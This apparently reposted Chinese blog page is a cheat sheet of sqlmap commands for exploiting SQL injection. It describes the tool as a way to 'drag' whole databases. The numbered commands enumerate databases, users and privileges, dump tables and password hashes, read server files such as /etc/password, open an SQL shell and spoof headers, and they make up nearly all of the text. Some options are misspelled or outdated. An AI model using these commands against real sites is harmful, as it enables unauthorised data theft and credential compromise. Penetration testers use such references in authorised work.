zoukankan      html  css  js  c++  java
  • SqlMap之数据库操作语句总结

    SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
     
    #>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 
     
    #> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库
     
    #>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户
     
    #>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户
     
    #>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名
     
    #> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名
     
    #>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 
     
    已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、
     
    MySQL数据库举例:
     

    1) 判断当前用户是否是dba
        python sqlmap.py -u "url" --is-dba -v 1

    2) --users:列出数据库管理系统用户
        python sqlmap.py -u "url" --users -v 0

    3) --passwords:数据库用户密码(hash)
        python sqlmap.py -u "url" --passwords -v 0
        python sqlmap.py -u "url" --passwords -U sa -v 0

    4) 查看用户权限
        python sqlmap.py -u "url" --privileges -v 0
        python sqlmap.py -u "url" --privileges -U postgres -v 0

    5) --dbs可以利用的数据库
        python sqlmap.py -u "url" --dbs -v 0

    6) --tables列数据库表
        python sqlmap.py -u "url" --tables -D "information_scheam"

        -D:指定数据名称

    7) --columns 列出表中的列名
        python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1

        -T:指定表名,-D:指定库名

    8) --dump列表中指定列的内容
        python sqlmap.py -u "url" --dump -T "users" -D "testdb"
        -C:可以指定字段

        指定列的范围为2到4
    python sqlmap.py -u "url" --dump -T "users" -D "testdb"  --start 2 --stop 4 -v 0

    9) --dumap-all列出所有数据库,所有表内容
        python sqlmap.py -u "url" --dump-all -v 0

        只列出用户自己新建的数据库和表的内容

        python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

    10) --file读取文件内容[load_file()函数]
          python sqlmap.py -u "url" --file /etc/password

    11) 执行SQL
          python sqlmap.py -u "url" --sql-shell

    12) -p 指定参数
          python sqlmap.py -u "url" -v 1 -p "id"

          -p可以指定多参数-p "cat,id"

    13) POST提交
          python sqlmap.py -u "url" --method POST --data "id=1"

    14) COOKIE提交
          python sqlmap.py -u "url" --cookie "id=1" -v 1

          cookie值可以由TamperData抓取

    15) refer欺骗

          python sqlmap.py -u "url" --refer "url" -v 3

    16) 使用自定义user-agent或者user-agents.txt
          python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

          python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

    17) 使用多线程猜解
          python sqlmap.py -u "url" -v 1 --current-user --threads 3

    18) 指定数据库,绕过SQLMAP的自动检测
          python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"

    19) 指定操作系统绕过SQLMAP自动检测
          python sqlmap.py -u "url" -v 2 --os "Windows"

    20) --prefix and --postfix自定义payload
          python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

    21) union注入测试
          python sqlmap.py -u "url" --union-test -v -1

    22) 配合order by
          python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

    23) python sqlmap.py -u "url" -v 1 --union-use --banner

    24) python sqlmap.py -u "url" -v 5 --union-use --current-user

    25) python sqlmap.py -u "url" -v 1 --union-use --dbs

  • 相关阅读:
    058_从键盘读取一个论坛积分,判断论坛用户等级
    057_统计 Linux 进程相关数量信息
    bzoj3436
    bzoj1202
    bzoj1044
    bzoj2338
    bzoj1854
    bzoj1856
    830C
    bzoj2132
  • 原文地址:https://www.cnblogs.com/milantgh/p/3631407.html
Copyright © 2011-2022 走看看